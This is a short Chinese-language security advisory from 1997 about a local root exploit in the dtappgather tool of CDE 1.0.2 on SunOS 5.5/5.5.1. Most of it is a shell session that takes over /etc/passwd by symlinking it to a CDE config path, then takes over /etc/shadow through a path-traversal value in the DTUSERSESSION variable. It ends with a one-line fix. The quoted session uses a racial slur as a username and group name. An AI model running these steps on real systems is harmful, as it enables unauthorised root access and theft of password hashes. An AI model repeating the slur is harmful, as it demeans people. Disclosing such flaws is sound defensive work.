SunOS 5.5 & 5.5.1 running CDE version 1.0.2漏洞
发布日期:1997-07-01
更新日期:1997-07-01
受影响系统:SunOS 5.5 & 5.5.1 running CDE version 1.0.2
描述:
运行以上版本的CDE的SUNOS5.5&5.5.1的用户可以通过"dtappgather"来改变文件 的所有权,由此可以获取root权限。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
nigg0r@host% ls -l /etc/passwd
-r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd
可以看到,属主是root 然后,我们将passwd和generic-display-0做符号连接:
nigg0r@host% ln -s /etc/passwd
/var/dt/appconfig/appmanager/generic-display-0
接着,运行dtappgather
nigg0r@host% dtappgather
MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists
我们再看/etc/passwd的所有权:
nigg0r@host% ls -l /etc/passwd
-r-xr-xr-x 1 nigg0r niggers 1585 Dec 17 22:26 /etc/passwd
可以看到,/etc/passwd的所有权已经属于了当前用户"nigg0r" 接下来来的步骤,将使你逐步获取/etc/shadow的所有权。
nigg0r@host % echo "nigg0r wins! Fatality!" | mail root
% cp /usr/dt/bin/dtappgather .
% truss -o koko ./dtappgather
% more koko
[ shity ld things ]
chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0
chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555) = 0
[ shitty things ]
$ id
uid=6969(foo) gid=666(bar)
$ ls -l /etc/shadow
-r-------- 1 root sys 234 Nov 7 1999 /etc/shadow
$ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
$ ls -l /etc/shadow
-r-xr-xr-x 1 foo bar 234 Nov 7 1999 /etc/shadow
建议:
chmod -s /usr/dt/bin/dtappgather
浏览次数:21445
严重程度:0(网友投票)